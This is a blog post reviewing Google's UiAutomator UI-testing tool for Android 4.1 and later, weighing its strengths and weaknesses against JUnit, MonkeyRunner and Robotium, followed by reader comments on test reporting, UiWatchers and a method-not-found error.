Section: 26.2 [ranges.syn] Status: C++20 Submitter: United States/Great Britain Opened: 2019-11-08 Last modified: 2021-02-25
Priority: 1
View all other issues in [ranges.syn].
View all issues with C++20 status.
Discussion:
Addresses US 273/GB 274
US 273:all_view is not a view like the others. For the other view types, foo_view{args...} is a valid way to construct an instance of type foo_view. However, all_view is just an alias to the type of view::all(arg), which could be one of several different types. all_view feels like the wrong name. Proposed change: Suggest renaming all_view to all_t and moving it into the views:: namespace.
GB 274:Add range_size_t. LEWG asked that range_size_t be removed from P1035, as they were doing a good job of being neutral w.r.t whether or not size-types were signed or unsigned at the time. Now that we've got a policy on what size-types are, and that P1522 and P1523 have been adopted, it makes sense for there to be a range_size_t. Proposed change: Add to [ranges.syn]:
template<range R> using range_difference_t = iter_difference_t<iterator_t<R>>;
David Olsen:The proposed wording has been approved by LEWG and LWG in Belfast.
[2019-11-23 Issue Prioritization]
Priority to 1 after reflector discussion.
[2020-02-10 Move to Immediate Monday afternoon in Prague]
Proposed resolution:
This wording is relative to N4835.
Change 26.2 [ranges.syn], header <ranges> synopsis, as indicated:
#include <initializer_list> #include <iterator> namespace std::ranges { […] // 26.4.2 [range.range], ranges template<class T> concept range = see below; […] template<range R> using range_difference_t = iter_difference_t<iterator_t<R>>; template<range R> using range_value_t = iter_value_t<iterator_t<R>>; […] // 26.7.5.2 [range.ref.view], all view namespace views {
inline constexpr unspecified all = unspecified; }template<viewable_range R> using all_ view= decltype( views::all(declval<R>())); […] }
Globally replace all occurrences of all_view with views::all_t. There are 36 occurrences in addition to the definition in the <ranges> synopsis that was changed above. | https://cplusplus.github.io/LWG/issue3335 | CC-MAIN-2022-21 | refinedweb | 361 | 56.66 |
libmtp - util.c
#include <sys/time.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/stat.h> #include <fcntl.h> #include 'libmtp.h' #include 'util.h' Functions void data_dump (FILE *f, void *buf, uint32_t n) void data_dump_ascii (FILE *f, void *buf, uint32_t n, uint32_t dump_boundry)
This file contains generic utility functions such as can be used for debugging for example. Copyright (C) 2005-2007 Linus Walleij <[email protected] data_dump (FILE * f, void * buf, uint32_t n) This dumps out a number of bytes to a textual, hexadecimal dump. Parameters: f the file to dump to (e.g. stdout or stderr) buf a pointer to the buffer containing the bytes to be dumped out in hex n the number of bytes to dump from this buffer void data_dump_ascii (FILE * f, void * buf, uint32_t n, uint32_t dump_boundry) This dumps out a number of bytes to a textual, hexadecimal dump, and also prints out the string ASCII representation for each line of bytes. It will also print the memory address offset from a certain boundry. Parameters: f the file to dump to (e.g. stdout or stderr) buf a pointer to the buffer containing the bytes to be dumped out in hex n the number of bytes to dump from this buffer dump_boundry the address offset to start at (usually 0)
Generated automatically by Doxygen for libmtp from the source code. | http://huge-man-linux.net/man3/mtp_util.c.html | CC-MAIN-2018-05 | refinedweb | 234 | 75.4 |
#include <LiquidCrystal.h>//LCD display pinout - YM2004A & OV1604A//VSS LCD pin 1 - Connect to ground//VDD LCD pin 2 - Connect to +5V//V0 LCD pin 3 - Connect to potentiometer//RS LCD pin 4 - Arduino pin D07 //RW LCD pin 5 - Connect to ground//EN LCD pin 6 - Arduino pin D08//DB4 LCD pin 11 - Arduino pin D09//DB5 LCD pin 12 - Arduino pin D10//DB6 LCD pin 13 - Arduino pin D11//DB7 LCD pin 14 - Arduino pin D12//ELA LCD pin 15 - Arduino pin D13//ELK LCD pin 16 - Connect to ground//LiquidCrystal lcd(7, NULL, 8, 9, 10, 11, 12);LiquidCrystal lcd(7, 8, 9, 10, 11, 12);int screen_backlight = 13; //pin D13 will control the backlightfloat voltage_battery = 0; //pin A0float voltage_divider = (98700+9790)/9790; //((R1+R2)/R2)*voltage on A0-pinvoid setup() { pinMode(screen_backlight, OUTPUT); //LCD Setup digitalWrite(screen_backlight, HIGH); // turn backlight on. Replace 'HIGH' with 'LOW' to turn it off. lcd.begin(20,4); // columns, rows. use 16,2 for a 16x2 LCD, etc. lcd.clear(); // start with a blank screen lcd.setCursor(0,0); //LCD text row 1 lcd.print("Ui V");}void read_voltage() { //Voltage input, U must be lower then 5V, HW-diveded then SW-multiplied voltage_battery = analogRead(A0)*voltage_divider*5/1023;}void screen_print() {//Printing battery voltage level on LCD-screen lcd.setCursor(3,0); if(voltage_battery<10) { lcd.print(" "); } lcd.print(voltage_battery);}void loop() { read_voltage(); screen_print();}
ADC reading 1000 +2000 = 3000 /1000 = 3check the chips ADC AREF pin say it's 4.89 voltyou can compensate for that in code so your math is 1000 +2000 = 3000 /1000 = 3 * 5 =(V1) 15So a ADC reading of (V2) 5 volts = 15 volts
What are the exact voltages measured at the battery, the Arduino +5V pin and the analog input pin when it's connected up?
Your voltage divider adds up to about a factor 11, not as a factor 10.I guess that's what you are tripping over.
float voltage_divider = (98700+9790)/9790; //((R1+R2)/R2)*voltage on A0-pin
float voltage_divider = (98700.0+9790.0)/9790.0; //((R1+R2)/R2)*voltage on A0-pin
@be80beWhy the extra 1K resistor before the A0-pin?
Please enter a valid email to subscribe
We need to confirm your email address.
To complete the subscription, please click the link in the
Thank you for subscribing!
Arduino
via Egeo 16
Torino, 10131
Italy | http://forum.arduino.cc/index.php?topic=140203.0 | CC-MAIN-2015-14 | refinedweb | 395 | 60.85 |
On 10 January 2011 11:26, Nick Coghlan [email protected] wrote:
On Mon, Jan 10, 2011 at 11:11 AM, Ron Adam [email protected] wrote:.
Yep - 99.99% of python code will never care if this is ever fixed. However, the fact that we've started using acceleration modules and pseudo-packages in the standard library means that "things should just work" is being broken subtly in the stuff we're shipping ourselves (either by creating pickling problems, as in unittest, or misleading introspection results, as in functools and datetime).
And if we're going to fix it at all, we may as well fix it right :)
I certainly don't object to fixing this, and neither do I object to adding a new class / module / function attribute to achieve it.
However... is there anything else that this fixes? (Are there more examples "in the wild" where this would help?)
The unittest problem with pickling is real but likely to only affect a very, very small number of users. The introspection problem (getsource) for functools and datetime isn't a real problem because the source code isn't available. If in fact getsource now points to the pure Python version even in the cases where the C versions are being used then "fixing" this seems like a step backwards...
Python 3.2:
import inspect from datetime import date inspect.getsource(date) 'class date:\n """Concrete date type.\n\n ...'
Python 3.1:
import inspect from datetime import date inspect.getsource(date) Traceback (most recent call last): ... IOError: source code not available
With your changes in place would Python 3.3 revert to the 3.1 behaviour here? How is this an advantage?
What I'm really asking is, is the cure (and the accompanying implementation effort and additional complexity to the Python object model) worse than the disease...
All the best,
Michael Foord
Cheers, Nick.
-- Nick Coghlan | [email protected] | Brisbane, Australia
Python-ideas mailing list [email protected]
--
May you do good and not evil May you find forgiveness for yourself and forgive others May you share freely, never taking more than you give. -- the sqlite blessing | https://mail.python.org/archives/list/[email protected]/message/5DG4ZYHGEPHSURSXDR36KFEROYI464OH/ | CC-MAIN-2021-04 | refinedweb | 361 | 66.03 |
Template literals (Template strings) followed by arguments with the values of any substitutions, which is useful for DSLs.
Template literals are sometimes informally called template strings, but they aren't string literals and can't be used everywhere a string literal can be used. Also, a tagged template literal may not result in a string; it's up to the tag function what it creates (if anything).
Syntax
// Untagged, these create strings: `string text` `string text line 1 string text line 2` `string text ${expression} string text` // Tagged, this calls the function "example" with the template as the // first argument and substitution values as subsequent arguments: example`string text ${expression} string text`
Descriptiontick in a template literal, put a backslash (
\) before the
backtick.
`\`` === '`' // -->"
Using template literals, you can do the same like this:
console.log(`string text line 1 string text line 2`); // "string text line 1 // string text line 2"
Expression interpolation
In order to embed expressions within normal strings, you would use the following syntax:
let a = 5; let b = 10; console.log('Fifteen is ' + (a + b) + ' and\nnot ' + (2 * a + b) + '.'); // "Fifteen is 15 and // not 20."
Now, with template literals, you are able to make use of the syntactic sugar, making substitutions like this more readable:
let a = 5; let b = 10; console.log(`Fifteen is ${a + b} and not ${2 * a + b}.`); // "Fifteen is 15 and // not 20."
Nesting templates
In certain cases, nesting a template is the easiest (and perhaps more readable) way to
have configurable strings. Within a backticked template, it is simple to allow inner
backticks by using them inside a placeholder
${ } within the template.
For instance, if condition a is
true, then
return this
templated literal.
In ES5:.
The tag function can then perform whatever operations on these arguments you wish, and return the manipulated string. (Alternatively, it can return something completely different, as described in one of the following examples.)
The name of the function used for the tag can be whatever you want.
let person = 'Mike'; let age = 28; function myTag(strings, personExp, ageExp) { let str0 = strings[0]; // "That " let str1 = strings[1]; // " is a " let str2 = strings[2]; // "." let ageStr; if (ageExp > 99){ ageStr = 'centenarian'; } else { ageStr = 'youngster'; } // We can even return a string built using a template literal return `${str0}${personExp}${str1}${ageStr}${str2}`; } let output = myTag`That ${ person } is a ${ age }.`; console.log(output); // That Mike is a youngster.
Tag functions don't even need to return a string!
function template(strings, ...keys) { return (function(...values) { let dict = values[values.length - 1] || {}; let result = [strings[0]]; keys.forEach(function(key, i) { let value = Number.isInteger(key) ? values[key] : dict[key]; result.push(value, strings[i + 1]); }); return result.join(''); }); } let t1Closure = template`${0}${1}${0}!`; //let t1Closure = template(["","","","!"],0,1,0); t1Closure('Y', 'A'); // "YAY!" let t2Closure = template`${0} ${'foo'}!`; //let t2Closure = template([""," ","!"],0,"foo"); t2Closure('Hello', {foo: 'World'}); // "Hello World!" let t3Closure = template`I'm ${'name'}. I'm almost ${'age'} years old.`; //let t3Closure = template(["I'm ", ". I'm almost ", " years old."], "name", "age"); t3Closure('foo', {name: 'MDN', age: 30}); //"I'm MDN. I'm almost 30 years old." t3Closure({name: 'MDN', age: 30}); //"I'm MDN. I'm almost 30 years old."
Raw strings
The special
raw property, available on the first argument to the tag
function,.
let str = String.raw`Hi\n${2+3}!`; // "Hi\\n5!" str.length; // 6 Array.from(str) "
\0o" and followed by one or more digits, for example
\0o251—not from untagged template literals:
let bad = `bad escape sequence: \unicode`;
Specifications
Browser compatibility
BCD tables only load in the browser | https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/template_literals | CC-MAIN-2022-05 | refinedweb | 601 | 59.5 |
Why should .NET developers be interested in Jamstack?
This post was contributed by our friends at Kentico Kontent.
If you’re a .NET or C# developer, the Jamstack approach to building websites might have fallen off your radar over the years. With the development of the Jamstack ecosystem, now might be the right time for you to build on a Jamstack architecture and utilize all your well-deserved .NET skills.
What marmalade cake are you talking about?
Jamstack—one of the key concepts is pre-rendering. In Jamstack sites the entire frontend is prepared at the build time, and the resulting static output is served from a content delivery network (CDN).
As a Jamstack developer, you don’t want to write all the logic for transforming your project into static files. Instead, you want to use some tools for this pre-rendering. These tools are doing a lot of fancy stuff for you—usually they allow you to apply templates, handle all the bundling and minification, and provide you with a rich ecosystem of plugins for specific use cases like data fetching from CMS, site map generating, or optimizing images. These tools are called static site generators. But let’s talk .NET now, where a generator called Statiq is quickly becoming a popular option.
U jokin’? Why would I want to build a static site in the 2020s?
Glad you asked! These are not static sites full of GIFs and WordArt from the `90s—though I love those retro feeling ones like on my university programming teacher’s site. Browsers, JavaScript, and APIs have all advanced in capabilities since then. These days you can implement dynamic functionalities like authentication, payments, or search even on static sites.
So, how to jam on .NET?
With Statiq! Statiq is a static site generator for .NET. It brings the first-class experience of both Visual Studio and VS Code – including Intellisense and debugging – to the Jamstack world. In combination with the .NET platform and many built-in features like pipelines, modules, preview server, and shortcodes, it is a great entry ticket for .NET developers and teams into Jamstack.
The Statiq project contains a general-purpose static generation framework called Statiq Framework and a convention-based static site generator called Statiq Web that’s built on top of it. From now on, we will be referring to Statiq.Web when talking about Statiq.
The basics of Statiq
For a start, let’s explain some key concepts and specifics of Statiq. I believe these are essential to having a solid base when starting with this static site generator.
Documents
A document is a primary unit of information in Statiq. It consists of content and metadata. Imagine that Statiq is like a document database that can process these documents. To be more precise, these documents are immutable. When a document is processed, it’s returned a new instance of the document. Documents are manipulated by modules.
Modules
A module is a component that performs a specific action with documents. A module takes documents as input, does an operation based on those documents (possibly transforming them), and outputs documents as a result of whatever operation was performed. Modules are typically chained in a sequence called a pipeline.
Pipelines
A pipeline is a document processing unit. A pipeline consists of one or more modules. Basically, the pipeline is a workflow blueprint of how your modules should handle documents. One might find a slight analogy with a controller in .NET MVC, nevertheless, it’s good to think about pipelines in a more declarative way. You just specify what your output should be rather than how to transform and produce it.
Pipelines have their own lifecycle process defined by phases. When pipelines and modules are executed, the current state is passed in the execution context.
Gimme code!
In this section, we’ll create a new static site powered by Statiq from scratch. The site will contain one root page, a listing of the articles, and article detail pages. The example will showcase rendering using Razor pages as well as Handlebars templates. Then we’ll use a third party module for fetching and rendering content from the headless CMS Kontent. In the end, we’ll publish our site to Netlify, with preview functionality.
Note: If you just want to see working code published on Netlify, you can fork my repository and start from Step 7.
Prerequisites
Installing the .NET Core SDK is the only prerequisite. This tutorial assumes you are familiar with the basics of frontmatter, markdown formatting, and the .NET ecosystem.
Step 1: Create a new project
- Run
dotnet new console --name StatiqTutorialfrom the command line.
- Navigate to your newly created
StatiqTutorialdirectory and run
dotnet add package Statiq.Web --version 1.0.0-beta.14(you can find the latest version of the framework on Nuget).
Create a bootstrapper in your
Program.cs.
using Statiq.App; using Statiq.Web; namespace StatiqTutorial { public class Program { public static async Task<int> Main(string[] args) => await Bootstrapper .Factory .CreateWeb(args) .RunAsync(); } }
In your project, create an
inputfolder with an
index.mdfile with the following content. The input directory is a default path where Statiq looks for input files.
--- Title: My First Statiq page --- # Hello World! Hello from my first Statiq page.
Run
dotnet run. This command will create an output folder with the generated page.
By running
dotnet run -- previewStatiq will generate the
outputcontent (same as in the previous step). In addition, it’ll start your server and will serve content from the output directory.
You should see your rendered site at.
What just happened?
All the magic happened in the
CreateWeb(args) method that created a bootstrapper with Statiq functionality. Default configuration runs your app with several modules. The most important one is default processing of your input markdown files and generating a page with the same name with content in HTML.
Step 2: Create an index page with a custom Razor template
Go to
Program.csand replace it with the code below. With this bootstrapper setup, you tell Statiq you don’t want all the default magic, and you’d rather take care of the content rendering on your own. However, the
AddHostingCommands()is still providing you with preview functionality.
using System.Threading.Tasks; using Statiq.App; using Statiq.Web; namespace StatiqTutorial { public class Program { public static async Task<int> Main(string[] args) => await Bootstrapper .Factory .CreateDefault(args) .AddHostingCommands() .RunAsync(); } }
In the
inputfolder remove
index.mdand create a
contentdirectory. In this directory, we’ll have our input files for content. In the
input/contentcreate a new
home.mdfile with the following code.
--- Title: Hello World from Statiq! Content: This is a root page of the statically generated site powered by Statiq. This page is rendered by Razor view template. Statiq Web is a powerful static website generation toolkit suitable for most use cases. It's built on top of Statiq Framework, so you can always extend or customize it beyond those base capabilities as well. This is an example of how to render one single page. ---
This will be your local content data source file for your home page. It’s a basic frontmatter markdown content with the
Title and
Content properties.
- In the
inputdirectory create
Home.cshtmlfile with content.
- Create
HomeViewModel.cs.
- When you check the
Home.cshtmlyou’ll find out that your HomeViewModel is not visible from this view. To fix it, create new
_ViewImports.cshtmlin the input directory.
- Now we need to tell Statiq how we want to process and handle our input file. Create a
HomePipeline.csfile. In the Input phase, this pipeline reads our
content/home.mdfile. The Process phase uses
ExtractFrontMatterand
ParseYamlmodules that get content from this file. We need to somehow connect our input document with our view. We achieve this by using the
MergeContentmodule in the
RenderRazormodule, where we specify how to create an appropriate view model. The
SetDestinationmodule determines where your files will be written. In the last Output phase, we use the
WriteFilesmodule for writing our output files.
- Run
dotnet run -- preview. You should see your markdown content rendered on the Razor page similar to this deployed on Netlify.
Step 3: Create a listing page with a Razor template
- In
input/content/featurescopy the following markdown files. These will be our content data source for the listing page. You can find content and structure for these files on GitHub.
- In the
inputfolder create
FeaturesListing.cshtml.
- Create
Feature.cs,
FeaturesListingViewModel.cs, and
FeaturesListingRazorPipeline.cs. It’s worth mentioning that in the Process phase we are using the execution context of the current pipeline, where we are adding content from our markdown files as children of the document. In the Output phase, we are iterating through the document’s children, and we are creating
List<Feature>features object, which is used by
FeaturesListingViewModel. Other principles are similar to those described in Step 2.
- After running
dotnet run -- previewyou should see your features listing at. 5.If you’d like to use the HandleBars template instead, you can find the pipeline and template on GitHub. The principles are the same.
Step 4: Create a detail page with default markdown rendering
- Create
FeatureDetailPipeline.cs. In the Process phase, this pipeline uses the
RenderMarkdownmodule that renders markdown.
- Run
dotnet run -- preview. Now your links from both (Razor and HandleBars) listing pages leading to the detail one should work.
Step 5: Prepare content in the headless CMS Kontent
When you want to enable content authors to create and manage content, it’s more convenient to provide them with the capabilities of Headless CMS than to edit your codebase directly. In this step, we’ll create a project in headless CMS Kontent. Moreover, we’ll create a new home page, which will use content from this CMS.
- Go to kontent.ai and create a new project.
Go to Content Types and create a new Home content type. Add Title and Content text elements. Save changes.
Go to the Content & Assets section and create a new content item Hello World from Statiq! based on Home content type. Fill in Title and Content elements. Publish the content item.
In the Settings section, you will find your ProjectId and Preview API keys. You will need them in the next step.
Step 6: Integrate content from the CMS into our Statiq site
First, we’ll generate strongly typed classes for our content types. This helps us to work with content from the headless CMS in a safe, strongly typed way. Then we’ll use the Kontent.Statiq module to fetch and use our content in the new pipeline.
- Install Kentico Kontent Generator utility.
- In the root of your project, create a PowerShell script file named
GenerateModels.ps1.
- For the local configuration in the root of your project, create
appsettings.json. Replace projectId with the one from the previous step.
- When you run this script, it generates strongly typed models together with ITypeProvider in the Models folder.
- Add Kontent.Statiq module to your project.
- Register CustomTypeProvider and DeliveryClient in the bootstrapper.
- Create
HomeFromCmsPipeline.csfile. This pipeline uses the Kontent.Statiq module in the Input phase. In the Process phase, we are reusing the
Home.cshtmlrazor view. All the magic happens in the Process phase. We are creating
HomeViewModelusing an already created new constructor. The parameter of the constructor is Statiq’s document created with content from the headless CMS.
- Run
dotnet run -- preview. At should see your rendered content from the headless CMS.
Pro tip: You can also check how your site looks and behaves with unpublished content. Just enable preview mode in
appsettings.json and use the Preview API key from the previous step.
{ "DeliveryOptions": { "ProjectId": "YOUR_PROJECT_ID", "PreviewApiKey": "YOUR_API_KEY", "UsePreviewApi": true } }
Step 7: Let’s publish it on Netlify
We will create two sites on Netlify. While one will build our production site with published content, the other one will use unpublished preview content. Netlify’s built machines got installed .NET5 framework by default. Make sure in your project’s
.csproj file you are targeting
net5.0 as a target framework.
- Push the whole project to your GitHub repository. Do not include
appsettings.json. We will provide these settings in the form of environment variables. If you don’t want to follow all the previous steps, you can fork my repository and start from here.
- Go to Netlify and create a new site from Git, select your repository.
Fill in
dotnet runas a Build command and
outputas a Publish directory. Add a new
DeliveryOptions\_\_ProjectIdvariable and enter your projectId. Note: Netlify uses double underscore (__) as the delimiter for the nested environment variables.
Click Deploy site. Your site will be ready within minutes.
Step 8: Unpublished preview content on Netlify
- For previewing unpublished content, create a new site following steps from Step 7. In addition, you will have to provide a PreviewApiKey and UsePreviewApi flag.
Besides
DeliveryOptions\_\_ProjectIdadd two new environment variables
DeliveryOptions\_\_PreviewApiKeywith your Preview API Key value and
DeliveryOptions__UsePreviewApiwith true value.
Click Deploy site. Your preview site will be ready within minutes.
Pro tip: Add webhooks for rebuilding your site when content is changed. You can learn more about Kontent webhooks and Netlify build in this article.
Wrap-up, next steps, and resources
This tutorial is meant to be an introduction to the Statiq static site generator. There are opportunities for you to make additions to the code around styling, SEO, and even adding JavaScript for more capabilities. If you would like to use a more complete template, I’d recommend the Statiq Lumen starter, which is a blog site built with Statiq and Kentico Kontent that uses SEO best practices and had a great Lighthouse score. Another resource on connecting Statiq with the CMS is Jamstack on .NET: From zero to hero with Statiq and Kontent.
About the author
Martin Makarsky is a developer advocate and hacker at Kentico. During the day he tries to find ways to help people with code. At nights, he’s hacking at first glance incompatible pieces into meaningful structures. He writes at
About Kentico Kontent
Kontent is a cloud-native headless CMS that lets you build websites and applications fast. Integrate Kontent directly into your Netlify site for faster deployments and unrestricted design possibilities. Reach out about using Kontent with your next production Netlify project. | https://www.netlify.com/blog/2021/01/22/why-should-.net-developers-be-interested-in-jamstack/ | CC-MAIN-2021-10 | refinedweb | 2,384 | 59.8 |
Yesterday I got a review copy of Automate the Boring Stuff with Python. It explains, among other things, how to manipulate PDFs from Python. This morning I needed to rotate some pages in a PDF, so I decided to try out the method in the book.
The sample code uses PyPDF2. I’m using Conda for my Python environment, and PyPDF2 isn’t directly available for Conda. I searched Binstar with
binstar search -t conda pypdf2
The first hit was from JimInCO, so I installed PyPDF2 with
conda install -c pypdf2
I scanned a few pages from a book to PDF, turning the book around every other page, so half the pages in the PDF were upside down. I needed a script to rotate the even numbered pages. The script counts pages from 0, so it rotates the odd numbered pages from its perspective.
import PyPDF2 pdf_in = open('original.pdf', 'rb') pdf_reader = PyPDF2.PdfFileReader(pdf_in) pdf_writer = PyPDF2.PdfFileWriter() for pagenum in range(pdf_reader.numPages): page = pdf_reader.getPage(pagenum) if pagenum % 2: page.rotateClockwise(180) pdf_writer.addPage(page) pdf_out = open('rotated.pdf', 'wb') pdf_writer.write(pdf_out) pdf_out.close() pdf_in.close()
It worked as advertised on the first try.
One thought on “Rotating PDF pages with Python”
For comparison, the Perl version: | https://www.johndcook.com/blog/2015/05/01/rotating-pdf-pages-with-python/ | CC-MAIN-2017-22 | refinedweb | 210 | 69.28 |
Important: Please read the Qt Code of Conduct -
[Solved] QML WebView Error: Cannot assign to non-existent property "onLoadFinished"
In order to try out the latest Qt Quick Controls that came with Qt 5.1, I started making a barebones browser. Here is the code snippet that shows WebView in action:
@
import QtWebKit 3.0
import QtQuick 2.0
import QtQuick.Controls 1.0
import QtQuick.Layouts 1.0
WebView {
id: browser
Layout.fillHeight: true
Layout.fillWidth: true
url: ""
onLoadStarted: { loadingStatus.text = "Loading url.text" }
onLoadFinished: { loadingStatus.text = "Loading done." }
}
@
Executing this gives me an error:
@ Cannot assign to non-existent property "onLoadFinished" @
What am I missing here?
P.S.: I am using import QtWebKit 3.0 here. Is that a concern?
Ok. Later on, I discovered that QtWebKit 3.0's WebView, indeed, doesnt have property "onLoadFinished". It, along with onLoadStarted, has been replaced by onLoadingChanged property.
However, Qt Creator coughs a supposed syntax error when using that, as apparent by "this post of mine.":
Hence, this whole confusion arose.
Anyway, I am marking this thread as solved. | https://forum.qt.io/topic/30028/solved-qml-webview-error-cannot-assign-to-non-existent-property-onloadfinished/2 | CC-MAIN-2021-49 | refinedweb | 179 | 55.2 |
"Drunkenness does not create vice; it merely brings it into view" ~Seneca
So Jelly Bean 4.2 landed with much fanfare and tucked in amongst the neat new OS and SDK features (hello, multi-user tablets!) was this little gem for testers: UiAutomator.jar. I have it on good authority that it snuck in amongst the updates in the preview tools and OS updates sometime around 4.1 with r3 of the platform. As a code-monkey of a tester, I was intrigued. One of the best ways Google can support developers struggling with platform fragmentation is to make their OS more testable so I hold high hopes with every release to see effort spent in that area. I have spent a couple days testing out the new UiAutomator API and the best way I can think of describing it is that Android's JUnit and MonkeyRunner got drunk and had a code baby. Let me explain what I mean before that phrase sinks down into "mental image" territory.
JUnit, for all its power and access to every interface, every service, every nook and cranny in your app, is limited to only running within your app's context. It carries the full heft of all the years of *Unit development elsewhere in test automation but it remains too close to its unit test roots to be serviceably fast and agile to develop in for UI automation. Moreover the limitation of only being able to test the associated product app prevents testers from fully exploring the interactions between applications and systems elsewhere on the device.
Conversely Android's MonkeyRunner is based in a Java adaptation of Python (Jython, no kidding) and it has access to a whole host of interfaces outside of the particular application you're trying to test. It can be used for mobile web testing, capturing screenshots of any app interaction, and since it is based in Python, is fairly quick to script. Its shortcomings are pretty severe when it comes to deep integration with application architecture so you are left clicking sometimes blindly in order to generate events (sendkeys, x/y coordinates, d-pad actions, oh my!).
It is easy to see where these two tools could complement each other well if combined. Deep application integration with simpler scripting and full-device access, not just sandboxed inside a single app's context could be really powerful. I say "could be" for a reason though and that's after a few days' mucking around with the tool. Let's go over the good aspects first.
The Good:
- Since UIAutomator still uses JUnit as the basis for its test runner, most of the familiar test case structures are available in all the best ways.
- Of special importance are UiWatchers which are like async police whom you can configure to lurk outside of test cases to catch common difficulties affecting tests (such as dialogs and alerts) or embedded within tests themselves for more specific triggers.
- The XML hierarchy dump tool in Monitor/DDMS is amazingly fast by comparison to the old Hierarchy Viewer, and gets you everything you need as a tester to identify the specific UI elements your test will need without the distractions. Brilliant.
- The tests compile as a separate JAR which you push to the device/emulator in shared filespace so that the application-under-test-sandboxing of former JUnit test projects will be a thing of the past. Even better, the JAR still executes on the device allowing for massive parallelization just like before (sure, I am tempted to brag about having a parallelization problem but I'll take the high road this time)
- Simple, repeatable syntax for getting objects from the UI to interact with means you spend less time coding and more time constructing useful tests (at least, that's the hope, when it works)
- Use of Accessibility labels enforces good coding practices. Just like iOS's UI Automation, this tool takes advantage of some oft-overlooked aspects of complete code and so testers get convenient UI hooks, and the sight-impaired get better apps. Win, meet my friend Win. You two have lots to talk about.
The Bad:
- Just like the former JUnit, this one lacks portable XML test results output which means it is just feels like Google don't like good, thorough reporting.
- Furthermore, on the reporting side of life, the lack of XML output is compounded by the lack of Eclipse integration for running the tests. You will spend a lot of time with the command line. As you're aware from my previous posts, we've built an extensive CI system and hooked it up to a device lab which is accessible even from within Eclipse. This tool is not there yet.
- JUnit's overly verbose coding style is still present meaning writing tests is still complex and you need to know a lot about device limitations, timing of events in the UI, and other kinds of non-trivial, deeper than scripting, test automation heavy lifting. I would say this is still a 4 out of 5 in terms of code complexity. Maybe a 3 if your app plays nicely. I would say my UIAutomator test cases are likely to contain 80% to 120% as many lines of code as my straight up JUnit-based UI test cases. No real gains here (yet).
- This tool only works on devices and emulators graced with Android 4.1 (or higher). This is because the tests are run via an app included with the OS on the device. Over the next few years this will allow you to begin getting wider device coverage with tests written using this tool but until then you can't use the UIAutomator for compatibility tests. Fragmentation's a mean ol' dog who won't be put down easily.
So what are we left with when we add this all up? I'd say while UIAutomator won't revolutionize the way I write UI test automation overnight, it shows tremendous promise. When this little code baby matures over the next year or two, with some more support from the Open Source community, I can see this going way beyond tools like Robotium. For those of you who are very comfortable in Java and JUnit, this will get you writing UI Automation faster than Robotium did, and with its ability to break out of the sandbox, you'll be getting more creative with what you're willing to test.
What's the TL:DR?
Why you want to use this: no more app sandbox for JUnit-based tests, better coding practices, more automatable scenarios with deeper device integration.
Why you'll want to pull your hair out: still no native XML output, no Eclipse integration, still too verbose to be clean and fast, and it only works on devices/emulators running Jelly Bean 4.1 and above.
Final Words
Writing comprehensive automation for UI tests on devices is still really hard. There is huge support in the Android community for brave testers who like a challenge and Google have provided us another option. If Android's JUnit and MonkeyRunner's drunken tryst resulted in all this already, I say we all buy Google's Android test developers another round.
Thanks for the review Russell! It sounds like, for the time being anyway this tool's biggest weakness is that it only runs on 4.2. One of the biggest wins for automation (especially on Android) is crossing multiple configs, this tool isn't the one for that. Like you said, maybe after the baby grows up a bit.
Hi Brian. Thanks for the comment. I've corrected my post to state that it is supported on devices running 4.1 and forward but even with that, Jelly Bean is less than 5% of total Android marketshare. One of the huge advantages to this tool however is its ability to test anything the device can do. I imagine if you've got a 4.1 phone or tablet, you can even test other people's apps without access to their source code like you'd need with regular JUnit.
Great tool..It is nice to see here about UIautomater.
Could you tell me whether this UIautomater can supports for android web views like HypbridApps ?
I posted some similar findings here:
I don't think the verbosity is wholly a by-product of being JUnit -- for example, libraries like Mockito manage to keep test code shorter by having nice methods you can statically import and using plenty of method chaining. That's missing in UI Automator.
As for the lack of JUnit XML support, I've already asked on the adt-dev mailing list about adding support to the excellent "android-junit-report" project, but with little luck so far:
The big win over Robotium is that it supports crossing package boundaries. Robotium can only test the Activities that live in the package under test. UI Automator works across the whole system.
The biggest downside for me is that it's tied so closely to the system, therefore updates and bug fixes seem likely to be released infrequently, i.e. once per Android OS update.
Is it possible to modify the android-junit-project ourselves...instead of waiting for Google to support it?
Thanks for the comments, Christopher.
The verbosity is a Java thing. With projects like Cucumber and other Ruby-style BDD test semantics libraries out there, I would hope that future updates to tools designed to make automating the UI easier would try and move that direction. Sure, you can port Cucumber to Java but without native support for that level of semantics, you're just asking people to add an unnecessarily ungainly semantic translation layer themselves and that gets hard to support quickly.
Which ties back to your other concerns about XML and just support in general. I think the pace of development on the platform itself is already so fast that these kinds of efforts are all measured against how much of a return they'd provide. It just seems like Google aren't convinced doing so within the Android project is worth their effort, especially with the open source community doing their best already to fill in the gaps.
We use Robotium already and get our JUnit XML output from Polidea's XML test runner JAR. A quick build-time android:uses-permission insertion in the Manifest to add SDcard access to debug builds gives us a place on disk to write test results for easy retrieval. We'd probably just use "adb run-as" for most purposes but Robotium's screenshot tool points to a non /data/data/your.package.name directory so I kill two birds with one stone and pipe all file output there and pull a single directory back to the CI system. I have a few posts about it elsewhere in the blog.
As for crossing package boundaries, I completely agree. This is an incredibly powerful tool for scenarios that require whole-device manipulation (so long as that doesn't involve needing access inside WebViews apparently). I look forward to expanding my test automation support coverage accordingly.
Thank you for your great writeup! My first impression is that it's a lot quicker to write testcases using this framework, as compared to Robotium. The webview limitation is as expected, but you probably can still inject javascript like with Robotium.
But, I could not get the UiWatcher to work, it does not ever seem to be called even when the UiSelector does not match anything. Do you per chance have a sample you want to share?
Thanks for the comment, jmk.
I just wrote up a quick demo test JAR to walk through the use of Watchers. I'll post it and an article about using them tomorrow. Stay tuned!
Hey Russell, great write up, pretty useful.
Thanks...cheers!
Hi Russell,
I am facing method not found error while running uiautomator test cases on my device.
I get the following error result on my command prompt while running the test cases.
"Error in testDemo2:
java.lang.NoSuchMethodError: com.android.uiautomator.core.UiSelector.textMatches
at mh_test.MainClass.testDemo2(MainClass.java:61)
at java.lang.reflect.Method.invokeNative(Native Method)
at com.android.uiautomator.testrunner.UiAutomatorTestRunner.start(UiAuto
matorTestRunner.java:121)
at com.android.uiautomator.testrunner.UiAutomatorTestRunner.run(UiAutoma
torTestRunner.java:82)
at com.android.commands.uiautomator.RunTestCommand.run(RunTestCommand.ja
va:76)
at com.android.commands.uiautomator.Launcher.main(Launcher.java:83)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:237)
